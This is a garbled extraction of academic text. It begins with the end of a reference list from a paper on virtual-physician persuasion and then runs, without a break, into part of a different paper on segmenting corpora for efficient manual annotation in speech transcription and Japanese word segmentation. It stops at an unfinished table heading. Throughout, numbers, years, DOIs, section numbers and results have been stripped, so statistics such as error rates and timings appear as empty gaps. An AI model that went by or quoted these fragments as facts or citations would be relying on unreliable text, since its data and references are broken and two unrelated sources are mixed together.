preferences for physician persuasion strategies. theoretical medicine ( ): – doi . /bf . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /g h. . http://dx.doi.org/ . // - x. . . http://dx.doi.org/ . /j.cognition. . . http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /is. . . man http://dx.doi.org/ . /j.otohns. . . http://dx.doi.org/ . /j.pec. . . http://dx.doi.org/ . /j.cognition. . . http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /i http://dx.doi.org/ . /srep http://dx.doi.org/ . /mra. . http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ o’hair d, o’hair mj, southward gm, krayer kj. . physician communication and patient compliance. journal of compliance in health care ( ): – . ohana s, mash r. . physician and patient perceptions of cultural competency and medical compliance. health education research ( ): – doi . /her/cyv . pallak sr. . salience of a communicator’s physical attractiveness and persuasion: a heuristic versus systematic processing interpretation. social cognition ( ): – doi . /soco. . . . . pallak sr, murroni e, koch j. . 
communicator attractiveness and expertise, emotional versus rational appeals, and persuasion: a heuristic versus systematic processing interpretation. social cognition ( ): – doi . /soco. . . . . parsons td, kenny p, ntuen ca, pataki cs, pato mt, rizzo aa, st-george c, sugar j. . objective structured clinical interview training using a virtual human patient. studies in health technology and informatics : – . patel h, macdorman kf. . sending an avatar to do a human’s job: compliance with authority persists despite the uncanny valley. presence: teleoperators and virtual environments ( ): – doi . /pres_a_ . peña j, yoo s-c. . under pressure: avatar appearance and cognitive load effects on attitudes, trustworthiness, bidding, and interpersonal distance in a virtual store. presence: teleoperators and virtual environments ( ): – doi . /pres_a_ . perry sd, jenzowsky sa, hester jb, king cm, yi h. . the influence of commercial humor on program enjoyment and evaluation. journalism & mass communication quarterly ( ): – doi . / . persky s. . employing immersive virtual environments for innovative experiments in health care communication. patient education and counseling ( ): – doi . /j.pec. . . . persky s, eccleston cp. . medical student bias and care recommendations for an obese versus non-obese virtual patient. international journal of obesity : – . pickersgill t. . the european working time directive for doctors in training: we will need more doctors and better organisation to comply with the law. bmj: british medical journal ( ): . plant ea, baylor al, doerr ce, rosenberg-kima rb. . changing middle-school students’ attitudes and performance regarding engineering with computer-based social models. computers & education ( ): – doi . /j.compedu. . . . pornpitakpan c. . the persuasiveness of source credibility: a critical review of five decades’ evidence. journal of applied social psychology ( ): – doi . /j. - . .tb .x. potempa km, redman rw, landstrom g. . human resources in nursing education: a worldwide crisis. collegian ( ): – doi . /j.colegn. . . . qiu l, benbasat i. . evaluating anthropomorphic product recommendation agents: a social relationship perspective to designing information systems. journal of management information systems ( ): – doi . /mis - . raij ab, johnsen k, dickerson rf, lok bc, cohen ms, duerson m, pauly rr, stevens ao, wagner p, lind ds. . comparing interpersonal interactions with a virtual human to those with a real human. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . read jl, shortell sm. . interactive games to promote behavior change in prevention and treatment. jama ( ): – doi . /jama. . . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /her/cyv http://dx.doi.org/ . /soco. . . . http://dx.doi.org/ . /soco. . . . http://dx.doi.org/ . /pres_a_ http://dx.doi.org/ . /pres_a_ http://dx.doi.org/ . / http://dx.doi.org/ . /j.pec. . . http://dx.doi.org/ . /j.compedu. . . http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.colegn. . . http://dx.doi.org/ . /mis - http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /jama. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ reips u-d, funke f. . interval-level measurement with visual analogue scales in internet-based research: vas generator. behavior research methods ( ): – doi . /brm. . . . roebuck mc, liberman jn, gemmill-toyama m, brennan ta. . medication adherence leads to lower health care use and costs despite increased drug spending. 
health affairs ( ): – doi . /hlthaff. . . sertoglu ae, catl o, korkmaz s. . examining the effect of endorser credibility on the consumers' buying intentions: an empirical study in turkey. international review of management and marketing : . seyama j, nagayama rs. . the uncanny valley: effect of realism on the impression of artificial human faces. presence: teleoperators and virtual environments ( ): – doi . /pres. . . . skalski p, tamborini r. . the role of social presence in interactive agent-based persuasion. media psychology ( ): – doi . / . sklar dp. . how many doctors will we need? a special issue on the physician workforce. academic medicine ( ): – doi . /acm. . swain s, hariharan m, rana s, chivukula u, thomas m. . doctor–patient communication: impact on adherence and prognosis among patients with primary hypertension. psychological studies ( ): – doi . /s - - - . thompson d. . designing serious video games for health behavior change: current status and future directions. journal of diabetes science and technology ( ): – doi . / . tongpeth j, du hy, clark ra. . development and feasibility testing of an avatar-based education application for patients with acute coronary syndrome. journal of clinical nursing ( – ): – doi . /jocn. . van der heide b, schumaker em. . computer-mediated persuasion and compliance: social influence on the internet and beyond. social net: understanding our online behavior : – doi . /acprof:oso/ . . . vermeire e, hearnshaw h, van royen p, denekens j. . patient adherence to treatment: three decades of research. a comprehensive review. journal of clinical pharmacy and therapeutics ( ): – doi . /j. - . . .x. willson p, mcnamara jr. . how perceptions of a simulated physician–patient interaction influence intended satisfaction and compliance. social science & medicine ( ): – doi . / - ( ) - . wood nt, solomon mr, englis bg. . personalisation of online avatars: is the messenger as important as the message? international journal of internet marketing and advertising ( / ): – doi . /ijima. . . zanbaka c, goolkasian p, hodges l. . can a virtual cat persuade you? the role of gender and realism in speaker persuasiveness. in: proceedings of the sigchi conference on human factors in computing systems, new york: acm, – doi . / . . zibrek k, kokkinara e, mcdonnell r. . the effect of realistic appearance of virtual characters in immersive environments—does the character's personality play a role? ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . .
segmentation for efficient supervised language annotation with an explicit cost-utility tradeoff

matthias sperber , mirjam simantzik , graham neubig , satoshi nakamura , alex waibel
karlsruhe institute of technology, institute for anthropomatics, germany; mobile technologies gmbh, germany; nara institute of science and technology, ahc laboratory, japan
matthias.sperber@kit.edu, mirjam.simantzik@jibbigo.com, neubig@is.naist.jp, s-nakamura@is.naist.jp, waibel@kit.edu

abstract

in this paper, we study the problem of manually correcting automatic annotations of natural language in as efficient a manner as possible. we introduce a method for automatically segmenting a corpus into chunks such that many uncertain labels are grouped into the same chunk, while human supervision can be omitted altogether for other segments. a tradeoff must be found for segment sizes. choosing short segments allows us to reduce the number of highly confident labels that are supervised by the annotator, which is useful because these labels are often already correct and supervising correct labels is a waste of effort. in contrast, long segments reduce the cognitive effort due to context switches. our method helps find the segmentation that optimizes supervision efficiency by defining user models to predict the cost and utility of supervising each segment and solving a constrained optimization problem balancing these contradictory objectives. a user study demonstrates noticeable gains over pre-segmented, confidence-ordered baselines on two natural language processing tasks: speech transcription and word segmentation.

1 introduction

many natural language processing (nlp) tasks require human supervision to be useful in practice, be it to collect suitable training material or to meet some desired output quality. given the high cost of human intervention, how to minimize the supervision effort is an important research problem. previous works in areas such as active learning, post editing, and interactive pattern recognition have investigated this question with notable success (settles, ; specia, ; gonzález-rubio et al., ).

(a) it was a bright cold (they) in (apron), and (a) clocks were striking thirteen.
(b) it was a bright cold (they) in (apron), and (a) clocks were striking thirteen.
(c) it was a bright cold (they) in (apron), and (a) clocks were striking thirteen.
figure 1: three automatic transcripts of the sentence "it was a bright cold day in april, and the clocks were striking thirteen", with recognition errors in parentheses. the underlined parts are to be corrected by a human for (a) sentences, (b) words, or (c) the proposed segmentation.

the most common framework for efficient annotation in the nlp context consists of training an nlp system on a small amount of baseline data, and then running the system on unannotated data to estimate confidence scores of the system's predictions (settles, ). sentences with the lowest confidence are then used as the data to be annotated (figure 1(a)). however, it has been noted that when the nlp system in question already has relatively high accuracy, annotating entire sentences can be wasteful, as most words will already be correct (tomanek and hahn, ; neubig et al., ). in these cases, it is possible to achieve much higher benefit per annotated word by annotating sub-sentential units (figure 1(b)).
however, as settles et al. ( ) point out, simply maximizing the benefit per annotated instance is not enough, as the real supervision effort varies greatly across instances. this is particularly important in the context of choosing segments to annotate, as human annotators heavily rely on semantics and context information to process language, and intuitively, a consecutive sequence of words can be supervised faster and more accurately than the same number of words spread out over several locations in a text. this intuition can also be seen in our empirical data in figure 2, which shows that for the speech transcription and word segmentation tasks described later in section 5, short segments had a longer annotation time per word. based on this fact, we argue it would be desirable to present the annotator with a segmentation of the data into easily supervisable chunks that are both large enough to reduce the number of context switches, and small enough to prevent unnecessary annotation (figure 1(c)).

figure 2: average annotation time per instance, plotted over different segment lengths (x-axis: segment length; y-axis: avg. time / instance [sec]; one curve each for the transcription task and the word segmentation task). for both tasks, the effort clearly increases for short segments.

in this paper, we introduce a new strategy for natural language supervision tasks that attempts to optimize supervision efficiency by choosing an appropriate segmentation. it relies on a user model that, given a specific segment, predicts the cost and the utility of supervising that segment. given this user model, the goal is to find a segmentation that minimizes the total predicted cost while maximizing the utility. we balance these two criteria by defining a constrained optimization problem in which one criterion is the optimization objective, while the other criterion is used as a constraint. doing so allows specifying practical optimization goals such as "remove as many errors as possible given a limited time budget," or "annotate data to obtain some required classifier accuracy in as little time as possible."

solving this optimization task is computationally difficult, an np-hard problem. nevertheless, we demonstrate that by making realistic assumptions about the segment length, an optimal solution can be found using an integer linear programming formulation for mid-sized corpora, as are common for supervised annotation tasks. for larger corpora, we provide simple heuristics to obtain an approximate solution in a reasonable amount of time. experiments over two example scenarios demonstrate the usefulness of our method: post editing for speech transcription, and active learning for japanese word segmentation.

2 problem definition

the goal of our method is to find a segmentation over a corpus of word tokens $w_1^n$ that optimizes supervision efficiency according to some predictive user model. the user model is denoted as a set of functions $u_{l,k}(w_a^b)$ that evaluate any possible subsequence $w_a^b$ of tokens in the corpus according to criteria $l \in L$, and supervision modes $k \in K$.
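to make the role of these user model functions concrete, the following sketch shows one way such a model could be organized in code. it is purely illustrative: the class and function names are ours, not the paper's, and the zero-valued unsupervised mode anticipates the skip mode of the example discussed next.

    # illustrative organization of the user model u_{l,k}(w_a^b): a lookup from
    # (criterion, mode) to a function that scores a token span of the corpus.
    from dataclasses import dataclass
    from typing import Callable, Dict, List, Tuple

    Span = Tuple[int, int]    # token index range (a, b), inclusive
    Mode = str                # e.g. "type", "respeak", "skip"
    Criterion = str           # e.g. "cost", "utility"

    @dataclass
    class UserModel:
        functions: Dict[Tuple[Criterion, Mode], Callable[[List[str], Span], float]]

        def evaluate(self, criterion: Criterion, mode: Mode,
                     tokens: List[str], span: Span) -> float:
            # predicted value of supervising tokens[span] in the given mode
            return self.functions[(criterion, mode)](tokens, span)

    # an unsupervised mode simply contributes nothing on either criterion
    skip_cost = lambda tokens, span: 0.0
    skip_utility = lambda tokens, span: 0.0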
let us illustrate this with an example. sperber et al. ( ) defined a framework for speech transcription in which an initial, erroneous transcript is created using automatic speech recognition (asr), and an annotator corrects the transcript either by correcting the words by keyboard, by respeaking the content, or by leaving the words as is. in this case, we could define k = {type, respeak, skip}, each constant representing one of these three supervision modes. our method will automatically determine the appropriate supervision mode for each segment. the user model in this example might evaluate every segment according to two criteria l, a cost criterion (in terms of supervision time) and a utility criterion (in terms of number of removed errors), when using each mode. intuitively, respeaking should be assigned both lower cost (because speaking is faster than typing), but also lower utility than typing on a keyboard (because respeaking recognition errors can occur). the skip mode denotes the special, unsupervised mode that always returns zero cost and zero utility.

other possible supervision modes include multiple input modalities (suhm et al., ), several human annotators with different expertise and cost (donmez and carbonell, ), and correction vs. translation from scratch in machine translation (specia, ). similarly, cost could instead be expressed in monetary terms, or the utility function could predict the improvement of a classifier when the resulting annotation is not intended for direct human consumption, but as training data for a classifier in an active learning framework.

3 optimization framework

given this setting, we are interested in simultaneously finding optimal locations and supervision modes for all segments, according to the given criteria. each resulting segment will be assigned exactly one of these supervision modes. we denote a segmentation of the $n$ tokens of corpus $w_1^n$ into $m \le n$ segments by specifying segment boundary markers $s_1^{m+1} = (s_1 = 1, s_2, \ldots, s_{m+1} = n+1)$. setting a boundary marker $s_i = a$ means that we put a segment boundary before the $a$-th word token (or the end-of-corpus marker for $a = n+1$). thus our corpus is segmented into token sequences $[(w_{s_j}, \ldots, w_{s_{j+1}-1})]_{j=1}^{m}$. the supervision modes assigned to each segment are denoted by $m_j$. we favor those segmentations that minimize the cumulative value $\sum_{j=1}^{m} [u_{l,m_j}(w_{s_j}^{s_{j+1}-1})]$ for each criterion $l$. for any criterion where larger values are intuitively better, we flip the sign before defining $u_{l,m_j}(w_{s_j}^{s_{j+1}-1})$ to maintain consistency (e.g. negative number of errors removed).

3.1 multiple criteria optimization

in the case of a single criterion ($|L| = 1$), we obtain a simple, single-objective unconstrained linear optimization problem, efficiently solvable via dynamic programming (terzi and tsaparas, ).
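as a minimal sketch of this single-criterion case (assuming a maximum segment length, in the spirit of the heuristics discussed later), such a dynamic program over segment end positions might look as follows; function and variable names are illustrative, not taken from the paper.

    # single-criterion segmentation: choose boundaries and modes minimizing the
    # summed criterion. u(a, b, mode) plays the role of u_{l,m_j} for the segment
    # covering tokens a..b-1.
    def segment_single_criterion(n, u, modes, max_len=20):
        INF = float("inf")
        best = [INF] * (n + 1)      # best[i]: optimal value for the first i tokens
        back = [None] * (n + 1)     # back[i]: (start, mode) of the last segment
        best[0] = 0.0
        for i in range(1, n + 1):
            for a in range(max(0, i - max_len), i):
                for mode in modes:
                    cand = best[a] + u(a, i, mode)
                    if cand < best[i]:
                        best[i], back[i] = cand, (a, mode)
        # recover the segmentation right to left
        segments, i = [], n
        while i > 0:
            a, mode = back[i]
            segments.append((a, i, mode))
            i = a
        return best[n], list(reversed(segments))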
however, in practice one usually encounters several competing criteria, such as cost and utility, and here we will focus on this more realistic setting. we balance competing criteria by using one as an optimization objective, and the others as constraints. this approach is known as the bounded objective function method in the multi-objective optimization literature (marler and arora, ); the very popular weighted sum method merges criteria into a single efficiency measure, but is problematic in our case because the number of supervised tokens is unspecified, and unless the weights are carefully chosen, the algorithm might find, e.g., the completely unsupervised or completely supervised segmentation to be most "efficient."

let criterion $l_1$ be the optimization objective criterion, and let $c_l$ denote the constraining constants for the criteria $l \in L_{-l_1} = L \setminus \{l_1\}$. we state the optimization problem:

\[
\begin{aligned}
\min_{m,\; s_1^{m+1},\; m_1^m} \quad & \sum_{j=1}^{m} \Big[ u_{l_1, m_j}\big(w_{s_j}^{s_{j+1}-1}\big) \Big] \\
\text{s.t.} \quad & \sum_{j=1}^{m} \Big[ u_{l, m_j}\big(w_{s_j}^{s_{j+1}-1}\big) \Big] \le c_l \qquad (\forall l \in L_{-l_1})
\end{aligned}
\]

this constrained optimization problem is difficult to solve. in fact, the np-hard multiple-choice knapsack problem (pisinger, ) corresponds to a special case of our problem in which the number of segments is equal to the number of tokens, implying that our more general problem is np-hard as well. in order to overcome this problem, we reformulate the search for the optimal segmentation as a resource-constrained shortest path problem in a directed, acyclic multigraph. while still not efficiently solvable in theory, this problem is well studied in domains such as vehicle routing and crew scheduling (irnich and desaulniers, ), and it is known that in many practical situations the problem can be solved reasonably efficiently using integer linear programming relaxations (toth and vigo, ).

in our formalism, the set of nodes $V$ represents the spaces between neighboring tokens, at which the algorithm may insert segment boundaries. a node with index $i$ represents a segment break before the $i$-th token, and thus the sequence of the indices in a path directly corresponds to $s_1^{m+1}$. edges $E$ denote the grouping of tokens between the respective nodes into one segment. edges are always directed from left to right, and labeled with a supervision mode. in addition, each edge between nodes $i$ and $j$ is assigned $u_{l,k}(w_i^{j-1})$, the corresponding predicted value for each criterion $l \in L$ and supervision mode $k \in K$, indicating that the supervision mode of the $j$-th segment in a path directly corresponds to $m_j$.
finally, the integrality condition ( ) forces all edges to be either fully activated or fully deacti- vated. the outlined problem formulation can solved directly by using off-the-shelf ilp solvers, here we employ gurobi (gurobi optimization, ). . heuristics for approximation in general, edges are inserted for every supervision mode between every combination of two nodes. the search space can be constrained by removing some of these edges to increase efficiency. in this study, we only consider edges spanning at most tokens. for cases in which larger corpora are to be anno- tated, or when the acceptable delay for delivering re- sults is small, a suitable segmentation can be found approximately. the easiest way would be to parti- tion the corpus, e.g. according to its individual doc- uments, divide the budget constraints evenly across all partitions, and then segment each partition inde- pendently. more sophisticated methods might ap- proximate the pareto front for each partition, and distribute the budgets in an intelligent way. user modeling while the proposed framework is able to optimize the segmentation with respect to each criterion, it also rests upon the assumption that we can provide user models ul,k(w j� i ) that accurately evaluate ev- ery segment according to the specified criteria and supervision modes. in this section, we discuss our strategies for estimating three conceivable criteria: annotation cost, correction of errors, and improve- ment of a classifier. . annotation cost modeling modeling cost requires solving a regression prob- lem from features of a candidate segment to annota- tion cost, for example in terms of supervision time. appropriate input features depend on the task, but should include notions of complexity (e.g. a confi- dence measure) and length of the segment, as both are expected to strongly influence supervision time. we propose using gaussian process (gp) regres- sion for cost prediction, a start-of-the-art nonpara- metric bayesian regression technique (rasmussen and williams, ) . as reported on a similar task by cohn and specia ( ), and confirmed by our preliminary experiments, gp regression signifi- cantly outperforms popular techniques such as sup- code available at http://www.gaussianprocess.org/gpml/ port vector regression and least-squares linear re- gression. we also follow their settings for gp, em- ploying gp regression with a squared exponential kernel with automatic relevance determination. de- pending on the number of users and amount of train- ing data available for each user, models may be trained separately for each user (as we do here), or in a combined fashion via multi-task learning as pro- posed by cohn and specia ( ). it is also crucial for the predictions to be reliable throughout the whole relevant space of segments. if the cost of certain types of segments is system- atically underpredicted, the segmentation algorithm might be misled to prefer these, possibly a large number of times. an effective trick to prevent such underpredictions is to predict the log time instead of the actual time. in this way, errors in the critical low end are penalized more strongly, and the time can never become negative. . error correction modeling as one utility measure, we can use the number of errors corrected, a useful measure for post editing tasks over automatically produced annotations. 
in order to measure how many errors can be removed by supervising a particular segment, we must es- timate both how many errors are in the automatic annotation, and how reliably a human can remove these for a given supervision mode. most machine learning techniques can estimate confidence scores in the form of posterior probabil- ities. to estimate the number of errors, we can sum over one minus the posterior for all tokens, which estimates the hamming distance from the reference annotation. this measure is appropriate for tasks in which the number of tokens is fixed in advance (e.g. a part-of-speech estimation task), and a reasonable approximation for tasks in which the number of to- kens is not known in advance (e.g. speech transcrip- tion, cf. section . . ). predicting the particular tokens at which a human will make a mistake is known to be a difficult task (olson and olson, ), but a simplifying constant for instance, consider a model that predicts well for seg- ments of medium size or longer, but underpredicts the supervi- sion time of single-token segments. this may lead the segmen- tation algorithm to put every token into its own segment, which is clearly undesirable. human error rate can still be useful. for example, in the task from section , we may suspect a certain number of errors in a transcript segment, and predict, say, % of those errors to be removed via typing, but only % via respeaking. . classifier improvement modeling another reasonable utility measure is accuracy of a classifier trained on the data we choose to annotate in an active learning framework. confidence scores have been found useful for ranking particular tokens with regards to how much they will improve a clas- sifier (settles, ). here, we may similarly score segment utility as the sum of its token confidences, although care must be taken to normalize and cali- brate the token confidences to be linearly compara- ble before doing so. while the resulting utility score has no interpretation in absolute terms, it can still be used as an optimization objective (cf. section . . ). experiments in this section, we present experimental results ex- amining the effectiveness of the proposed method over two tasks: speech transcription and japanese word segmentation. . speech transcription experiments accurate speech transcripts are a much-demanded nlp product, useful by themselves, as training ma- terial for asr, or as input for follow-up tasks like speech translation. with recognition accuracies plateauing, manually correcting (post editing) auto- matic speech transcripts has become popular. com- mon approaches are to identify words (sanchez- cortina et al., ) or (sub-)sentences (sperber et al., ) of low confidence, and have a human edi- tor correct these. . . experimental setup we conduct a user study in which participants post-edited speech transcripts, given a fixed goal word error rate. the transcription setup was such that the transcriber could see the asr transcript of parts before and after the segment that he was edit- ing, providing context if needed. when imprecise time alignment resulted in segment breaks that were software and experimental data can be downloaded from http://www.msperber.com/research/tacl-segmentation/ slightly “off,” as happened occasionally, that context helped guess what was said. 
the segment itself was transcribed from scratch, as opposed to editing the asr transcript; besides being arguably more efficient when the asr transcript contains many mistakes (nanjo et al., ; akita et al., ), preliminary experiments also showed that supervision time is far easier to predict this way. figure illustrates what the setup looked like. we used a self-developed transcription tool to conduct experiments. it presents our computed segments one by one, allows convenient input and playback via keyboard shortcuts, and logs user interactions with their time stamps. a selection of ted talks (english talks on technology, entertainment, and design; www.ted.com) served as experimental data. while some of these talks contain jargon such as medical terms, they are presented by skilled speakers, making them comparably easy to understand. initial transcripts were created using the janus recognition toolkit (soltau et al., ) with a standard, ted-optimized setup. we used confusion networks for decoding and obtaining confidence scores. for reasons of simplicity, and better comparability to our baseline, we restricted our experiment to two supervision modes: type and skip. we conducted experiments with participants, with several years of experience in transcription, with none. each participant received an explanation of the transcription guidelines, and a short hands-on training to learn to use our tool. next, they transcribed a balanced selection of segments of varying length and quality in random order. this data was used to train the user models. finally, each participant transcribed another two ted talks, with word error rate (wer) . % (predicted: . %). we set a target (predicted) wer of % as our optimization constraint (depending on the level of accuracy required by our final application, this target may be set lower or higher), and minimized the predicted supervision time as our objective function. both ted talks were transcribed once using the baseline strategy, and once using the proposed strategy. the order of both strategies was reversed between talks, to minimize learning bias due to transcribing each talk twice. the baseline strategy was adopted according to sperber et al. ( ): we segmented the talk into natural, subsentential units, using matusov et al. ( )'s segmenter, which we tuned to reproduce the ted subtitle segmentation, producing a mean segment length of . words. segments were added in order of increasing average word confidence, until the user model predicted a wer < %. the second segmentation strategy was the proposed method, similarly with a resource constraint of wer < %. supervision time was predicted via gp regression (cf. section . ), using segment length, audio duration, and mean confidence as input features. the output variable was assumed subject to additive gaussian noise with zero mean; a variance of seconds was chosen empirically to minimize the mean squared error. utility prediction (cf. section . ) was based on posterior scores obtained from the confusion networks. we found it important to calibrate them, as the posteriors were overconfident, especially in the upper range. to do so, we automatically transcribed a development set of ted data, grouped the recognized words into buckets according to their posteriors, and determined the average number of errors per word in each bucket from an alignment with the reference transcript. the mapping from average posterior to average number of errors was estimated via gp regression.
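to make these two regression steps concrete, the following is a minimal sketch rather than the authors' implementation: scikit-learn's GaussianProcessRegressor stands in for the gpml toolkit, an anisotropic squared exponential (rbf) kernel approximates the automatic relevance determination setting, and all feature values, timings, and bucket statistics are invented.

```python
# sketch only: hypothetical data; scikit-learn's GP regressor stands in for gpml.
import numpy as np
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.gaussian_process.kernels import RBF, WhiteKernel

# cost model: predict log supervision time from [length, audio duration, mean confidence]
X_cost = np.array([[3, 1.2, 0.9], [8, 3.5, 0.7], [15, 6.0, 0.5], [25, 9.8, 0.4]])
y_time = np.array([4.0, 11.0, 35.0, 60.0])  # seconds (invented)
cost_gp = GaussianProcessRegressor(
    kernel=RBF(length_scale=[1.0, 1.0, 1.0]) + WhiteKernel(),  # ard-style kernel + noise
    normalize_y=True,
)
cost_gp.fit(X_cost, np.log(y_time))  # predicting log time keeps predictions positive
predicted_seconds = np.exp(cost_gp.predict(np.array([[10, 4.0, 0.6]])))

# calibration: map bucketed asr posteriors to average errors per word on a dev set
bucket_posterior = np.array([[0.55], [0.65], [0.75], [0.85], [0.95]])
bucket_errors = np.array([0.45, 0.38, 0.25, 0.12, 0.04])  # invented dev-set averages
calib_gp = GaussianProcessRegressor(kernel=RBF() + WhiteKernel(), normalize_y=True)
calib_gp.fit(bucket_posterior, bucket_errors)

# calibrated per-token expected errors for one segment's posteriors
per_token_errors = calib_gp.predict(np.array([[0.62], [0.91], [0.84]]))
```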
the result was summed over all tokens, and multiplied by a constant human confidence, separately determined for each participant. . . simulation results to convey a better understanding of the potential gains afforded by our method, we first present a simulated experiment. we assume a transcriber who makes no mistakes, and needs exactly the amount of time predicted by a user model trained on the data of a randomly selected participant. we compare three scenarios: a baseline simulation, in which the baseline segments are transcribed in ascending order of confidence; a simulation using the proposed method, in which we change the wer constraint in small increments; and finally, an oracle simulation, which uses the proposed method, but with a utility model that knows the actual number of errors in each segment. (more elaborate methods for wer estimation exist, such as that of ogawa et al. ( ), but if our method achieves improvements using the simple hamming distance, incorporating more sophisticated measures will likely achieve similar, or even better, accuracy.) for each supervised segment, we simply replace the asr output with the reference, and measure the resulting wer.

figure : result of our segmentation method (excerpt), alternating segments such as ( ) skip: "nineteen forty six until today you see the green"; ( ) type: <annotator types: "is the traditional">; ( ) skip: "interstate conflict"; ( ) type: <annotator types: "the ones we used to">; ( ) skip: ... type segments are displayed empty and should be transcribed from scratch. for skip segments, the asr transcript is displayed to provide context. when annotating a segment, the corresponding audio is played back.

figure : simulation of post editing on an example ted talk, plotting the resulting wer [%] against post editing time [min] for the baseline, proposed, and oracle strategies. the proposed method reduces the wer considerably faster than the baseline at first; later both converge. the much superior oracle simulation indicates room for further improvement.

figure shows the simulation on an example ted talk, based on an initial transcript with . % wer. the proposed method is able to reduce the wer faster than the baseline, up to a certain point where they converge. the oracle simulation is even faster, indicating room for improvement through better confidence scores. . . user study results table shows the results of the user study. first, we note that the wer estimation by our utility model was off by about . %: while the predicted improvement in wer was from . % to . %, the actual improvement was from . % to about . %. the actual resulting wer was consistent across all users, and we observe strong, consistent reductions in supervision time for all participants.

table : transcription task results. for each user (p , p , p , and the average), the resulting wer [%] after supervision is shown for the baseline and the proposed method, along with the time [min] they needed. the unsupervised wer was . %.

prediction of the necessary supervision time was accurate: averaged over participants, : minutes were predicted for the baseline, : minutes measured. for the proposed method, : minutes were predicted, : minutes measured. on average, participants removed . errors per minute using the baseline, and . errors per minute using the proposed method, a speed-up of . %.
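the overall shape of the simulated comparison above can be re-created with a toy script; the sketch below uses a greedy best-utility-per-predicted-second ordering as a simplified stand-in for the globally optimized segment selection, and entirely invented segment statistics.

```python
# toy post-editing simulation: supervise segments in order of (estimated) utility per
# predicted second and track the corpus wer after each step; numbers are invented.
def simulate(segments, score):
    total_words = sum(s["words"] for s in segments)
    remaining_errors = sum(s["errors"] for s in segments)
    elapsed = 0.0
    curve = [(elapsed, remaining_errors / total_words)]
    for seg in sorted(segments, key=score, reverse=True):
        elapsed += seg["pred_time"]          # perfect-transcriber assumption
        remaining_errors -= seg["errors"]    # supervised segment becomes error-free
        curve.append((elapsed, remaining_errors / total_words))
    return curve

segments = [
    {"words": 12, "errors": 4, "est_errors": 3.1, "pred_time": 40.0},
    {"words": 20, "errors": 1, "est_errors": 1.8, "pred_time": 55.0},
    {"words": 7,  "errors": 3, "est_errors": 2.6, "pred_time": 25.0},
]
proposed = simulate(segments, lambda s: s["est_errors"] / s["pred_time"])
oracle = simulate(segments, lambda s: s["errors"] / s["pred_time"])  # knows true errors
```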
note that predicted and measured values are not strictly comparable: in the experiments, to provide a fair comparison participants transcribed the same talks twice (once using baseline, once the proposed method, in alternating order), resulting in a notice- able learning effect. the user model, on the other hand, is trained to predict the case in which a tran- scriber conducts only one transcription pass. as an interesting finding, without being informed about the order of baseline and proposed method, participants reported that transcribing according to the proposed segmentation seemed harder, as they found the baseline segmentation more linguistically reasonable. however, this perceived increase in dif- ficulty did not show in efficiency numbers. . japanese word segmentation experiments word segmentation is the first step in nlp for lan- guages that are commonly written without word boundaries, such as japanese and chinese. we ap- ply our method to a task in which we domain-adapt a word segmentation classifier via active learning. in this experiment, participants annotated whether or not a word boundary occurred at certain positions in a japanese sentence. the tokens to be grouped into segments are positions between adjacent characters. . . experimental setup neubig et al. ( ) have proposed a pointwise method for japanese word segmentation that can be trained using partially annotated sentences, which makes it attractive in combination with active learn- ing, as well as our segmentation method. the authors released their method as a software pack- age “kytea” that we employed in this user study. we used kytea’s active learning domain adaptation toolkit as a baseline. for data, we used the balanced corpus of con- temporary written japanese (bccwj), created by maekawa ( ), with the internet q&a subcor- pus as in-domain data, and the whitepaper subcor- pus as background data, a domain adaptation sce- nario. sentences were drawn from the in-domain corpus, and the manually annotated data was then used to train kytea, along with the pre-annotated background data. the goal (objective function) was to improve kytea’s classification accuracy on an in- domain test set, given a constrained time budget of minutes. there were again supervision modes: annotate and skip. note that this is essentially a batch active learning setup with only one iteration. we conducted experiments with one expert with several years of experience with japanese word seg- mentation annotation, and three non-expert native speakers with no prior experience. japanese word segmentation is not a trivial task, so we provided non-experts with training, including explanation of the segmentation standard, a supervised test with immediate feedback and explanations, and hands-on training to get used to the annotation software. supervision time was predicted via gp regression (cf. section . ), using the segment length and mean confidence as input features. as before, the output variable was assumed subject to additive gaussian noise with zero mean and seconds variance. to ob- tain training data for these models, each participant annotated about example instances, drawn from the adaptation corpus, grouped into segments and balanced regarding segment length and difficulty. for utility modeling (cf. section . ), we first nor- malized kytea’s confidence scores, which are given in terms of svm margin, using a sigmoid function (platt, ). 
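a minimal sketch of this normalization step follows; the scale parameter is a free value (the next paragraph describes how it was actually chosen), and the function name is ours for illustration, not part of kytea.

```python
import numpy as np

def calibrated_confidence(margins, scale=1.0):
    """map raw svm margins to (0, 1) with a sigmoid (platt-style normalization)."""
    return 1.0 / (1.0 + np.exp(-scale * np.asarray(margins, dtype=float)))

# example: three boundary decisions with invented margins
print(calibrated_confidence([-1.5, 0.2, 2.0], scale=0.8))
```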
the normalization parameter was selected so that the mean confidence on a development set corresponded to the actual classifier accuracy. (kytea's active learning toolkit is available at http://www.phontron.com/kytea/active.html.) we derive our measure of classifier improvement for correcting a segment by summing over one minus the calibrated confidence for each of its tokens. to analyze how well this measure describes the actual training utility, we trained kytea using the background data plus disjoint groups of in-domain instances with similar probabilities and measured the achieved reduction of prediction errors. the correlation between each group's mean utility and the achieved error reduction was . . note that we ignore the decaying returns usually observed as more data is added to the training set. also, we did not attempt to model user errors. employing a constant base error rate, as in the transcription scenario, would change segment utilities only by a constant factor, without changing the resulting segmentation. after creating the user models, we conducted the main experiment, in which each participant annotated data that was selected from a pool of in-domain sentences using two strategies. the first, baseline strategy was as proposed by neubig et al. ( ). queries are those instances with the lowest confidence scores. each query is then extended to the left and right, until a word boundary is predicted. this strategy follows similar reasoning as was the premise to this paper: to decide whether or not a position in a text corresponds to a word boundary, the annotator has to acquire surrounding context information. this context acquisition is relatively time consuming, so he might as well label the surrounding instances with little additional effort. the second strategy was our proposed, more principled approach. queries of both methods were shuffled to minimize bias due to learning effects. finally, we trained kytea using the results of both methods, and compared the achieved classifier improvement and supervision times. . . user study results table 